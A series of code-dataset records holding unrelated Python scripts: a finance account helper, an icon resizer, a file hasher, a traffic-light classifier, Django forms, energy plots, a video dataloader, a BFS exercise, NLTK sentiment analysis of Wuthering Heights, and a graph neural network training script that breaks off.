skip_additional_payments=False):\n all_payments = []\n for account in self.subaccounts:\n subaccount_payments = account.get_all_payments(skip_additional_payments)\n if not all_payments:\n all_payments = subaccount_payments\n else:\n for index, (payment1, payment2) in enumerate(zip(all_payments, subaccount_payments)):\n all_payments[index] = payment1[0], payment1[1] + payment2[1], payment1[2] + payment2[2]\n return 
all_payments\n","sub_path":"gnewcash/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":26587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
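A short usage sketch of the `InterestAccount` class defined above, amortizing a loan until the balance hits zero. The figures are arbitrary; the constructor signature and the `(date, balance, amount_to_capital)` tuples come from the record:

from datetime import datetime
from decimal import Decimal

loan = InterestAccount(
    starting_balance=Decimal('10000'),
    starting_date=datetime(2019, 1, 1),
    interest_percentage=Decimal('0.05'),  # 5% APR; values > 1 are divided by 100
    payment_amount=Decimal('500'),
)
for payment_date, balance, to_capital in loan.get_all_payments():
    print(payment_date.date(), balance, to_capital)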
+{"seq_id":"309308950","text":"#!/usr/bin/python\n# coding=utf-8\n\n\n\"\"\"\nUsage:\n ue4-app-icons-generator.py <icon_path> <output_path>\n ue4-app-icons-generator.py C:/icon.png C:/Workspace/Pirates/src/Build\n\"\"\"\n\n\nimport re\nimport os\nimport sys\nimport json\nfrom docopt import docopt\nfrom PIL import Image\n\n\nCONFIG_PATH = \"config.json\"\nMATCH_PATTERN = r\"(\\d+)x(\\d+)\"\nIMAGE_RESAMPLE_MODE = Image.LANCZOS\n\n\ndef resize_and_save_icon(icon_file, save_path, size_str):\n size_group = re.match(MATCH_PATTERN, size_str)\n if size_group:\n w = int(size_group[1])\n h = int(size_group[2])\n new_icon = icon_file.resize((w, h), IMAGE_RESAMPLE_MODE)\n new_icon.save(save_path, 'png')\n print(\"[OK] %s %dx%d\" % (save_path, w, h))\n else:\n print(\"[FAILED] %s, size format error.\" % save_path)\n\n\ndef iter_file_list(icon_file, root_path, file_list):\n for filename in file_list:\n value = file_list[filename]\n new_path = os.path.join(root_path, filename)\n if type(value).__name__ == \"dict\":\n if not os.path.exists(new_path):\n os.makedirs(new_path)\n iter_file_list(icon_file, new_path, value)\n elif type(value).__name__ == \"str\":\n resize_and_save_icon(icon_file, new_path, value)\n else:\n print(\"[FAILED] Config parse failed.\")\n sys.exit(1)\n\n\ndef iter_config(icon_file, output_path):\n full_config_path = os.path.join(sys.path[0], CONFIG_PATH)\n with open(full_config_path, 'r') as config_file:\n file_list = json.load(config_file)\n iter_file_list(icon_file, output_path, file_list)\n\n\nif __name__ == \"__main__\":\n arguments = docopt(__doc__)\n icon_path = arguments[\"<icon_path>\"]\n output_path = arguments[\"<output_path>\"]\n\n print(\"icon path: %s\" % icon_path)\n print(\"output path: %s\" % output_path)\n\n with Image.open(icon_path) as icon_file:\n w, h = icon_file.size\n print('original image size: %sx%s' % (w, h))\n iter_config(icon_file, output_path)\n","sub_path":"ue4-app-icons-generator.py","file_name":"ue4-app-icons-generator.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
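`iter_file_list` above walks the loaded config recursively: a dict value creates a directory and recurses, a string value is parsed as `"WxH"` and the icon is resized to that size. A hypothetical `config.json`, shown as the dict `json.load` would return (all file and directory names here are made up):

file_list = {
    "Android": {
        "res_mdpi": {"icon.png": "48x48"},
        "res_xhdpi": {"icon.png": "96x96"},
    },
    "IOS": {"Icon40.png": "40x40", "Icon76.png": "76x76"},
}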
+{"seq_id":"93992733","text":"import hashlib\nimport os\nimport math\n\nfrom logger import ProgressLogger\n\n\nclass SingleHash():\n\n def __init__(self, path, readsize):\n self._path = path\n self._readsize = readsize\n file_size = os.path.getsize(path)\n progress = math.ceil(file_size / readsize)\n self._logger = ProgressLogger(progress)\n self._logger.log('Hashing file {} with size {}B.'.format(path, file_size))\n\n def hash_file(self):\n hash = hashlib.sha512()\n with open(self._path, 'rb') as file_handle:\n try:\n byte = file_handle.read(self._readsize)\n while byte != b'':\n hash.update(byte)\n self._logger.progress_tick()\n byte = file_handle.read(self._readsize)\n except Exception as e:\n print('An error occurred while hashing file: {}'.format(str(e)))\n finally:\n file_handle.close()\n return hash.hexdigest()\n","sub_path":"single_thread_hash.py","file_name":"single_thread_hash.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
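The read loop in `hash_file` above issues the same `read()` call in two places. An equivalent sketch using `iter()`'s two-argument (callable, sentinel) form, which stops at `b''` and keeps the read in one spot:

import hashlib

def hash_file_iter(path, readsize):
    # Same chunked SHA-512 as SingleHash.hash_file, without the duplicated read().
    digest = hashlib.sha512()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(readsize), b''):
            digest.update(chunk)
    return digest.hexdigest()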
+{"seq_id":"44101386","text":"from styx_msgs.msg import TrafficLight\nimport tensorflow as tf\nimport numpy as np\n\nclass TLClassifier(object):\n def __init__(self, using_sim):\n # A huge thanks to Alex Lechner https://github.com/alex-lechner/CarND-Capstone\n # and Mathias Koehnke https://github.com/mkoehnke/CarND-Capstone-TrafficLightDetection\n # for their documentation regarding the traffic light detection portion of this project.\n # By following their guides I was able to train my model, and implement it here.\n # Even then it was a struggle, but I definitely wouldn't have figured it out without\n # their code and docs to guide me.\n\n # The graph for the sim was trained on different images,\n # so we must choose it if we are in the sim\n if using_sim:\n self.graph_path = \"light_classification/model/sim_graph.pb\"\n # Use a stricter threshold for the sim, because our images are very crisp\n self.threshold = .70\n else:\n self.graph_path = \"light_classification/model/real_graph.pb\"\n # The real world is harder, so we relax the conditions.\n # We want to make sure we don't miss a red light.\n # In the future, it might be good to have different weights for\n # each type of light.\n self.threshold = .50\n\n self.graph = tf.Graph()\n\n with self.graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(self.graph_path, 'rb') as fid:\n od_graph_def.ParseFromString(fid.read())\n tf.import_graph_def(od_graph_def, name='')\n\n self.image_tensor = self.graph.get_tensor_by_name('image_tensor:0')\n self.boxes = self.graph.get_tensor_by_name('detection_boxes:0')\n self.scores = self.graph.get_tensor_by_name('detection_scores:0')\n self.classes = self.graph.get_tensor_by_name('detection_classes:0')\n self.num_detections = self.graph.get_tensor_by_name(\n 'num_detections:0')\n\n self.sess = tf.Session(graph=self.graph)\n\n\n def get_classification(self, image):\n \"\"\"Determines the color of the traffic light in the image\n\n Args:\n image (cv::Mat): image containing the traffic light\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n with self.graph.as_default():\n img_expand = np.expand_dims(image, axis=0)\n boxes, scores, classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={self.image_tensor: img_expand})\n\n boxes = np.squeeze(boxes)\n scores = np.squeeze(scores)\n classes = np.squeeze(classes).astype(np.int32) # needs to be an integer\n\n # Make an empty list to count all of the different guesses\n max_hits = [0]*4\n # Count one vote for the class of every detection above the threshold\n for detected_class, score in zip(classes, scores):\n if score > self.threshold:\n max_hits[detected_class] += 1\n # Take the Traffic Light state with the most guesses\n max_index = max_hits.index(max(max_hits))\n # This is the estimate that we will return\n if max_index == 1:\n print('RED')\n return TrafficLight.RED\n elif max_index == 2:\n print('YELLOW')\n return TrafficLight.YELLOW\n elif max_index == 3:\n print('GREEN')\n return TrafficLight.GREEN\n return TrafficLight.UNKNOWN","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
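A toy check of the per-detection voting logic in `get_classification`: two confident RED detections (class 1) outvote one GREEN (class 3), so index 1 wins. The arrays are made up; class ids 1/2/3 map to RED/YELLOW/GREEN as in the record:

import numpy as np

scores = np.array([0.9, 0.8, 0.75])
classes = np.array([1, 3, 1])
threshold = 0.5
max_hits = [0] * 4
for detected_class, score in zip(classes, scores):
    if score > threshold:
        max_hits[detected_class] += 1
assert max_hits.index(max(max_hits)) == 1  # RED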
+{"seq_id":"461763626","text":"\n# -*- coding:utf-8 -*-\n\n# Core Django imports\nfrom django import forms\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.forms.models import inlineformset_factory\n\n# Realative imports of the 'app-name' package\nfrom .models import SpeakerUser, KindContact\n\n\nclass SpeakerUserCreationForm(UserCreationForm):\n class Meta:\n model = SpeakerUser\n fields = ('username',)\n\n def clean_username(self):\n # Since User.username is unique, this check is redundant,\n # but it sets a nicer error message than the ORM. See #13147.\n username = self.cleaned_data[\"username\"]\n try:\n SpeakerUser._default_manager.get(username=username)\n except SpeakerUser.DoesNotExist:\n return username\n raise forms.ValidationError(self.error_messages['duplicate_username'])\n\n\nclass SpeakerUserChangeForm(UserChangeForm):\n class Meta:\n model = SpeakerUser\n fields = '__all__'\n\n\nclass SpeakerBasicInformationForm(forms.ModelForm):\n u\"\"\"\n Classe para o formulário de edição básica das\n informações do palestrante\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(SpeakerBasicInformationForm, self).__init__(*args, **kwargs)\n self.fields['first_name'].required = True\n self.fields['last_name'].required = True\n\n class Meta:\n u\"\"\"\n Define atributos do formulario\n \"\"\"\n\n model = SpeakerUser\n u\"\"\"\n Define qual Model será utilizado\n \"\"\"\n\n fields = ('id', 'first_name', 'last_name', 'bio',)\n u\"\"\"\n Atributos que irão aparecer no formulário\n \"\"\"\n\n help_texts = {\n 'first_name': _(\n u'Exemplo: Jhon'\n ),\n 'last_name': _(\n u'Exemplo: Doe'\n ),\n 'bio': _(\n u'Jhon Doe é programador django/python'\n ),\n }\n\n widgets = {\n 'first_name': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': _(u'Insira o primeiro nome'),\n }\n ),\n 'last_name': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': _(u'Insira o último nome'),\n }\n ),\n 'bio': forms.Textarea(\n attrs={\n 'class': 'form-control',\n 'placeholder': _(u'Insira um breve texto aqui'),\n }\n ),\n }\n\n error_messages = {\n 'first_name': {\n 'required': _(u'O primeiro nome é obrigatório')\n },\n 'last_name': {\n 'required': _(u'O último nome é obrigatório')\n },\n\n }\n\n\nclass SpeakerContactForm(forms.ModelForm):\n u\"\"\"\n Classe para o formulário de edição básica das\n informações do palestrante\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(SpeakerContactForm, self).__init__(*args, **kwargs)\n\n class Meta:\n u\"\"\"\n Define atributos do formulario\n \"\"\"\n\n model = KindContact\n u\"\"\"\n Define qual Model será utilizado\n \"\"\"\n\n fields = ('kind', 'value',)\n u\"\"\"\n Atributos que irão aparecer no formulário\n \"\"\"\n\n help_texts = {\n 'kind': _(\n u'Escolha um tipo de contato dentre as opções acima'\n ),\n 'value': _(\n u'Informe os dados da respectiva opção'\n ),\n }\n\n widgets = {\n\n 'kind': forms.Select(\n attrs={\n 'class': 'form-control',\n }\n ),\n 'value': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': _(u'Informe um valor aqui'),\n }\n ),\n }\n\nContactFormSet = inlineformset_factory(\n SpeakerUser,\n KindContact,\n form=SpeakerContactForm\n)\n","sub_path":"speakers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"634101398","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 12 14:23:16 2020\n\n@author: henry\n\"\"\"\n\nimport os\n\n# plt.legend()\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom src.plotting.myplotlib import init_figure, Columnes, Journal, save_figure\n\n\ndef plot_cumsum_plot(baseline, scenario1, scenario2, scenario3):\n journal = Journal.POWERPOINT_A3\n\n fig, ax = init_figure(nrows=1,\n ncols=1,\n columnes=Columnes.ONE,\n journal=journal)\n\n lbase = plot_cumsum_by_scenario(baseline[baseline.is_home], ax, label='Baseline')\n l1 = plot_cumsum_by_scenario(scenario1[scenario1.is_home], ax, label='Scenario 1')\n l2 = plot_cumsum_by_scenario(scenario2, ax, label='Scenario 2')\n l3 = plot_cumsum_by_scenario(scenario3, ax, label='Scenario 3')\n\n xlim = plt.xlim()\n lxy = plt.plot(np.arange(0, xlim[1]), np.arange(0, xlim[1]), label='x=y (only using pv generation)', color='k',\n linestyle=':', linewidth=2)\n lyx = plt.plot(np.arange(0, xlim[1]), - np.arange(0, xlim[1]), label='x=-y (only using grid generation)', color='k',\n linestyle=':', linewidth=2)\n\n lyx = plt.plot(np.arange(0, xlim[1]), 0 * np.arange(0, xlim[1]), label=None, color='k',\n linestyle='--', linewidth=2)\n xlim = plt.xlim()\n\n ylim = plt.ylim()\n ylim = (ylim[0], xlim[1])\n print(ylim)\n ax.set_ylim(ylim)\n ax.set_xlim((0, xlim[1]))\n plt.xlabel('Total energy used by cars (cumulative) [MWh]', labelpad=15)\n plt.ylabel('PV charging - grid charging \\n (cumulative) [MWh]', labelpad=15)\n leg = plt.legend(ncol=3, loc='upper left', bbox_to_anchor=(-0.15, -0.2), borderpad=0., frameon=False)\n plt.tight_layout()\n bbox_extra_artists = [fig, leg, ax]\n save_figure(os.path.join('plots', 'cumulative_energy_plot', 'cumsum_all_scenarios.png'),\n bbox_extra_artists=bbox_extra_artists)\n\n\ndef plot_cumsum_by_scenario(data_raw, ax, label=None):\n data = data_raw.copy()\n\n cumsum_saldo = (data['charged_from_pv'] - data['charged_from_outside']).cumsum() / 1000\n cumsum_total_consumption = data['needed_by_car'].cumsum() / 1000\n\n handle = ax.plot(cumsum_total_consumption, cumsum_saldo, label=label, linewidth=2)\n return handle[0]\n\n\ndef parse_dates(data_raw):\n data = data_raw.copy()\n data['start'] = pd.to_datetime(data['start'])\n data['end'] = pd.to_datetime(data['end'])\n\n return data\n\n\nif __name__ == '__main__':\n output_folder = os.path.join('.', 'data', 'output', 'PVMODEL_SPV170')\n\n baseline = pd.read_csv(os.path.join(output_folder, 'results_baseline.csv'))\n baseline = parse_dates(baseline).sort_values('start')\n\n scenario1 = pd.read_csv(os.path.join(output_folder, 'results_scenario1.csv'))\n scenario1 = parse_dates(scenario1).sort_values('start')\n\n scenario2 = pd.read_csv(os.path.join(output_folder, 'results_scenario2.csv'))\n scenario2 = parse_dates(scenario2).sort_values('start')\n\n scenario3 = pd.read_csv(os.path.join(output_folder, 'results_scenario3.csv'))\n scenario3 = parse_dates(scenario3).sort_values('start')\n\n plot_cumsum_plot(baseline, scenario1, scenario2, scenario3)\n","sub_path":"src/plotting/plot_cumsum_charging_strategies.py","file_name":"plot_cumsum_charging_strategies.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"445643612","text":"from __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport torch.utils.data\r\nfrom torch import nn, optim\r\nfrom torch.nn import functional as F\r\nimport os\r\nimport pandas as pd \r\nfrom skimage import io, transform\r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom torch.autograd import Variable\r\nfrom typing import Tuple\r\nimport skvideo.io\r\nfrom skimage import io, transform\r\n\r\n''' \r\nfor seq2seq model training\r\n'''\r\n\r\n\r\ndef sample_interval(length, points):\r\n interval = float(length)/float(points)\r\n indexes = []\r\n for i in range(points):\r\n index = int(interval*(i+1) - 1)\r\n indexes.append(index)\r\n return indexes\r\n\r\n\r\n# get only a portion of the whole videos \r\nclass splitLongVdDataset(Dataset):\r\n def __init__(self, data_dir, label_dir):\r\n self.data_dir = data_dir\r\n self.label_dir = label_dir\r\n self.videos = os.listdir(data_dir)\r\n self.H_re = 299\r\n self.W_re = 299\r\n #assert len(self.video_list) == self.len_data\r\n \r\n def __len__(self):\r\n return len(self.videos)\r\n \r\n def getVideoLen(self, idx):\r\n video_dir = os.path.join(self.data_dir, self.videos[idx])\r\n # video data in the form of multiple images\r\n video_files = os.listdir(video_dir) # multiple .jpg files\r\n return len(video_files)\r\n \r\n def getVideoFrames(self, idx, frame_idx):\r\n '''\r\n idx: video index\r\n frame_idx: frame index (list)\r\n '''\r\n video_dir = os.path.join(self.data_dir, self.videos[idx])\r\n \r\n # video data in the form of multiple images\r\n video_files = os.listdir(video_dir) # multiple .jpg files\r\n video_files.sort()\r\n img_stk = []\r\n img_collection = io.imread_collection([os.path.join(video_dir, video_files[i_img]) for i_img in frame_idx])\r\n \r\n for i_img in range(len(img_collection)):\r\n #img = io.imread(os.path.join(video_dir, video_files[i_img]))\r\n img = img_collection[i_img]\r\n img = transform.resize(img, [self.H_re, self.W_re, 3])\r\n img = img.astype(np.float32)\r\n img = img/255\r\n img_stk.append(img)\r\n #print(i_img)\r\n img_stk = np.stack(img_stk)\r\n #print(' image stack shape', img_stk.shape)\r\n \r\n # video label\r\n label_file = open(os.path.join(self.label_dir, self.videos[idx]) + '.txt', 'r')\r\n label_data = label_file.readlines()\r\n label_data = np.array(label_data, dtype=np.int)\r\n label_data = label_data[frame_idx]\r\n label_file.close()\r\n \r\n assert label_data.shape[0] == img_stk.shape[0]\r\n \r\n # convert to pytorch format\r\n img_stk = img_stk.transpose((0, 3, 1, 2))\r\n img_stk = torch.Tensor(img_stk)\r\n label_data = torch.LongTensor(label_data)\r\n \r\n return {'X': img_stk, 'Y': label_data}\r\n \r\n def __getitem__(self, idx):\r\n video_dir = os.path.join(self.data_dir, self.videos[idx])\r\n \r\n # video data in the form of multiple images\r\n video_files = os.listdir(video_dir) # multiple .jpg files\r\n video_files.sort()\r\n img_stk = []\r\n \r\n img_collection = io.imread_collection([os.path.join(video_dir, video_files[i_img]) for i_img in range(len(video_files))])\r\n for i_img in range(len(video_files)):\r\n img = img_collection[i_img]\r\n img = transform.resize(img, [self.H_re, self.W_re, 3])\r\n img = img.astype(np.float32)\r\n img = img/255\r\n img_stk.append(img_stk)\r\n print(i_img)\r\n img_stk = np.stack(img_stk)\r\n \r\n # video label\r\n print(os.path.join(self.label_dir, self.videos[idx]) + '.txt')\r\n label_file = open(os.path.join(self.label_dir, 
self.videos[idx]) + '.txt', 'r')\r\n label_data = label_file.readlines()\r\n label_file.close()\r\n label_data = np.array(label_data, dtype=np.int)\r\n print('Read label')\r\n \r\n \r\n assert label_data.shape[0] == img_stk.shape[0]\r\n \r\n # convert to pytorch format\r\n img_stk = img_stk.transpose((0, 3, 1, 2))\r\n img_stk = torch.Tensor(img_stk)\r\n label_data = torch.LongTensor(label_data)\r\n \r\n return {'X': img_stk, 'Y': label_data}\r\n \r\nif __name__ == '__main__':\r\n # data directory\r\n data_dir = 'HW5_data/FullLengthVideos/videos/train'\r\n label_dir = 'HW5_data/FullLengthVideos/labels/train'\r\n \r\n dataset = splitLongVdDataset(data_dir=data_dir, label_dir=label_dir)\r\n print('Dataset len:', len(dataset))\r\n \r\n print('video[0] len:', dataset.getVideoLen(0))\r\n frame_idx = list(range(200))\r\n sample = dataset.getVideoFrames(0, frame_idx)\r\n print('image stack shape:', sample['X'].shape)\r\n print('label shape: ', sample['Y'].shape)\r\n \r\n #sample = dataset[0]\r\n #print('image stack shape:', sample['X'].shape)\r\n #print('label shape: ', sample['Y'].shape)\r\n \r\n ","sub_path":"hw5/longVd_dataloader.py","file_name":"longVd_dataloader.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
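sample_interval at the top of this file picks `points` roughly evenly spaced frame indices out of a clip of `length` frames, always ending on the last frame. A standalone restatement with a couple of spot checks:

def sample_interval(length, points):
    # index_i = int(length/points * (i + 1) - 1)
    interval = float(length) / float(points)
    return [int(interval * (i + 1) - 1) for i in range(points)]

print(sample_interval(10, 4))  # -> [1, 4, 6, 9]
print(sample_interval(7, 3))   # -> [1, 3, 6]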
+{"seq_id":"565025070","text":"import sys\nsys.stdin = open('input.txt','r')\n\nn = int(input())\nnod = {}\ncango = {}\nfor a in range(n):\n nod[a], cango[a] = [] , []\n l = list(map(int,input().split()))\n for e in range(n):\n if l[e] == 1:\n nod[a].append(e)\n# print(nod)\n# print(cango)\n\nfor s in nod:\n # print(s)\n que = [s]\n visit = []\n while que:\n now = que.pop(0)\n # if now not in visit:\n # visit.append(now)\n for t in nod[now]:\n # print('t:',t)\n if t not in que + visit:\n que.append(t)\n visit.append(t)\n # print(que, visit)\n # print(visit,'end')\n for a in visit: cango[s].append(a)\n# print('cango:',cango)\n\nres = [['0']*n for _ in range(n)]\nfor a in range(n):\n for c in cango[a]:\n res[a][c] = '1'\n\nfor a in res: print(' '.join(a))","sub_path":"Problem/BaekJoon/11403.경로찾기(BFS).py","file_name":"11403.경로찾기(BFS).py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"481033974","text":"# Sentiment analysis on the piece of classic literature:\n# Wuthering Heights. For more information on nltk functions\n# and other Natural Language Processing Toolkit Applications\n# please visit https://www.nltk.org/. Happy coding!\n\nimport nltk\nfrom urllib import request\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nnltk.download('punkt')\n\n#pre-processing to grab text\nurl = \"https://www.gutenberg.org/files/768/768.txt\"\nresponse = request.urlopen(url)\nraw = response.read().decode('utf8')\ntokens = nltk.word_tokenize(raw)\ntext = nltk.Text(tokens)\n\n#concordance of the text file - print automatically\ntext.concordance(\"moors\")\n\n#common-contexts of where words appear - print automatically\ntext.common_contexts([\"moors\"])\ntext.common_contexts([\"Cathy\", \"Heathcliff\"])\n\n#word frequency and percentage\ncount_heathcliff = text.count(\"Heathcliff\")\nprint(count_heathcliff)\ntotal_words = len(text)\npercentage_heathcliff = count_heathcliff/total_words\nprint(percentage_heathcliff)\n\n#sentiment analysis\nnltk.download('vader_lexicon')\nsid = SentimentIntensityAnalyzer()\nscores = sid.polarity_scores(raw)\nprint(scores)\n","sub_path":"cs_applications_in_english/wuthering.py","file_name":"wuthering.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"424656018","text":"\n#### Importing all the packages\n\nfrom __future__ import print_function\nfrom __future__ import division\n\n### We import torch functionis \nimport torch\nfrom torchvision import datasets , transforms\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.nn as nn\n\nimport sys\nimport os\nsys.path.append(os.getcwd())\n\n\n#### We import custom functions \nfrom src.cfg.load_yaml import load_yamlcfg\nfrom src .builder import graphdataload\nfrom src. builder .graphdataload import classnames\nfrom src. utils.base_utils import increment_path ,sparse_mx_to_torch_sparse_tensor\nfrom src. models.models import grand\nfrom src. viz.viz_graph import t_SNE,plot_train_val_loss,plot_train_val_acc\nfrom src. viz.viz_graph import pca_tsne,tsne_legend\nfrom src. metrics.metric import classify,accuracy\n\n\n#### We import default functions\nimport time \nimport argparse\nimport numpy as np \nimport glob \nimport os \nimport logging\nimport random\nfrom pathlib import Path\nimport pyfiglet\nimport scipy.sparse as sp\n\n\n\n#### Logging of the data into the txt file \nlogging.getLogger().setLevel(logging.INFO)\n\nglobal device\n\n# https://github.com/wzfhaha/grand_dropedge\n\ndef preprocess(a):\n #d1 = np.array(a.sum(axis-1))**(-0.5)\n #d2 = np.array(a.sum(axis=0))**(-0.5)\n D1_ = np.array(a.sum(axis=1))**(-0.5)\n D2_ = np.array(a.sum(axis=0))**(-0.5)\n D1_ = sp.diags(D1_[:,0], format='csr')\n D2_ = sp.diags(D2_[0,:], format='csr')\n A_ = a.dot(D1_)\n A_ = D2_.dot(A_)\n A_ = sparse_mx_to_torch_sparse_tensor(A_) \n if torch.cuda.is_available():\n A_ = A_.cuda()\n return A_ \n\n\ndef random_edge_sample(edges, droprate,features):\n edges = list(edges)\n n = features.shape[0]\n m = len(edges)\n index = np.random.permutation(m)\n percent = 1. 
- droprate\n preserve_num = int(m * percent)\n \n index_ = index[:preserve_num]\n sample_row = [edges[x][0] for x in index_]\n sample_col = [edges[x][1] for x in index_]\n sample_adj = sp.csr_matrix((np.ones(preserve_num), (sample_row, sample_col)), shape=(n,n))\n sample_adj = sample_adj + sample_adj.T.multiply(sample_adj.T>sample_adj) - sample_adj.multiply(sample_adj.T>sample_adj) + sp.eye(n)\n sample_adj = preprocess(sample_adj)\n return sample_adj \n\n\n\n\ndef rand_prop(features, A,edges,dropnode_rate,orderr,training):\n n = features.shape[0]\n drop_rate = dropnode_rate\n # drop_rates = torch.FloatTensor(np.ones(n) * drop_rate)\n \n if training:\n a = random_edge_sample(edges,drop_rate,features)\n\n else : \n a = A \n\n features = propagate(features, a, orderr) \n return features\n\ndef consis_loss(logps, temp , lam):\n ps = [torch.exp(p) for p in logps]\n sum_p = 0.\n for p in ps:\n sum_p = sum_p + p\n avg_p = sum_p/len(ps)\n #p2 = torch.exp(logp2)\n \n sharp_p = (torch.pow(avg_p, 1./temp) / torch.sum(torch.pow(avg_p, 1./temp), dim=1, keepdim=True)).detach()\n loss = 0.\n for p in ps:\n loss += torch.mean((p-sharp_p).pow(2).sum(1))\n loss = loss/len(ps)\n return lam * loss\n\ndef propagate(feature, A, order):\n #feature = F.dropout(feature, args.dropout, training=training)\n #x = feature\n y = torch.spmm(A,feature).detach_()\n x = y\n for i in range(order):\n if i ==0:\n x = torch.spmm(A, x).detach_()\n else:\n x = torch.spmm(A, x).detach_()\n #print(y.add_(x))\n y.add_(x)\n #y= x\n return y.div_(order+1.0).detach_()\n\n###### Function to Train the dataset \n\ndef train(model, optimizer, features, adj, labels, idx_train,idx_val,epoch,sample,\\\n dropnode_rate,orderr, temp , lam,edges,valmode):\n\n X = features\n\n model.train()\n optimizer.zero_grad()\n\n X_list = []\n K = sample\n for k in range(K):\n X_list.append(rand_prop(X,adj,edges,dropnode_rate,orderr, training=True))\n\n output_list = []\n for k in range(K):\n output_list.append(torch.log_softmax(model(X_list[k]), dim=-1))\n\n loss_train = 0.\n for k in range(K): \n loss_train += F.nll_loss(output_list[k][idx_train], torch.max(labels[idx_train],1)[1])\n\n loss_train = loss_train/K\n\n loss_consis = consis_loss(output_list, temp , lam)\n \n loss_train = loss_train + loss_consis\n \n acc_train = accuracy(output_list[0][idx_train], torch.max( labels[idx_train],1)[1])\n loss_train.backward()\n optimizer.step()\n\n if not valmode:\n # Evaluate validation set performance separately,\n # deactivates dropout during validation run.\n with torch.no_grad():\n model.eval()\n X = rand_prop(X,adj,edges,dropnode_rate,orderr,training=False)\n output = model(X)\n output = torch.log_softmax(output, dim=-1)\n\n loss_val = F.nll_loss(output[idx_val],torch.max( labels[idx_val],1)[1]) \n acc_val = accuracy(output[idx_val], torch.max( labels[idx_val],1)[1])\n\n\n return loss_train.data.item(), acc_train.data.item() , loss_val.data.item(),acc_val.data.item()\n\n\n\ndef test(model, features, adj, edges,idx_test,labels,outputviz,data_type,dropnode_rate,orderr,fig_path):\n \n model.eval()\n X = features\n X = rand_prop(X,adj,edges,dropnode_rate,orderr, training=False)\n output = model(X)\n output = torch.log_softmax(output, dim=-1)\n\n loss_test = F.nll_loss(output[idx_test],torch.max( labels[idx_test],1)[1])\n acc_test = accuracy(output[idx_test], torch.max( labels[idx_test],1)[1])\n\n \n print(\"Test set results:\", \"loss= {:.4f}\".format(loss_test.item()), \"accuracy= {:.4f}\".format(acc_test.item()))\n logging.info(\"Testing loss: {:.4f} acc: 
{:.4f} \".format(loss_test.item(),acc_test.item())) #array([0, 1], dtype=int64)\n\n report = classify(output,labels,classnames[data_type]) \n logging.info('GCN Classification Report: \\n {}'.format(report))\n\n if outputviz :\n logging.info(\"\\n[STEP 5]: Visualization {} results.\".format(data_type))\n ## Make a copy for pca and tsneplot \n outs = output\n label=labels\n # Calculate the predicted value\n \n output = output.cpu().detach().numpy()\n labels = labels.cpu().detach().numpy()\n \n ## visualization with normal tsne and pc \n result_tsne = t_SNE(output, labels,2,fig_path)\n pca_tsne(outs,label,fig_path)\n # tsne_legend(outs, label, classnames[data_type], 'test_set',fig_path)\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"GNN Node Classification\")\n\n\n parser.add_argument('--config_path', action='store_true', \\\n default='E:\\\\Freelance_projects\\\\GNN\\\\Tutsv2\\\\pyGNN_NC_XAI_V2\\\\Grand_DropEdge\\\\config\\\\grand_cora.yaml', help='Provide the config path')\n\n #### to create an inc of directory when running test and saving results \n parser.add_argument('--name', default='exp', help='save results to project/name')\n parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')\n\n\n args = parser.parse_args()\n\n\n ###### Params loading from config File \n\n config_path = args.config_path\n configs = load_yamlcfg(config_file= config_path)\n\n data_type = configs['Data']['datatype']\n data_saveresult= configs['Data']['save_results']\n train_datapath = configs['Data']['datapath']\n train_seedvalue = configs['random_state']\n model_type = 'grand_dropedge'\n train_modelsave = configs['Data']['model_save_path']\n train_savefig = configs['Data']['save_fig']\n test_outputviz = configs['Data']['output_viz']\n\n #--------------------------------------------------------------#\n dropout= configs['Model']['dropout']\n ipdim= configs['Model']['input_dim']\n opdim= configs['Model']['output_dim']\n hiddim= configs['Model']['hidden_dim']\n ip_droprate = configs['Model']['dropout']\n hid_droprate = configs['Model']['dropout']\n use_bn = configs['Model']['use_bn']\n #--------------------------------------------------------------#\n train_lr = configs['Hyper']['LR']\n train_wtdecay = configs['Hyper']['weight_decay']\n train_epochs = configs['Hyper']['epochs']\n train_valmode = False\n train_patience=configs['Hyper']['Patience']\n\n\n #--------------------------------------------------------------#\n sample = 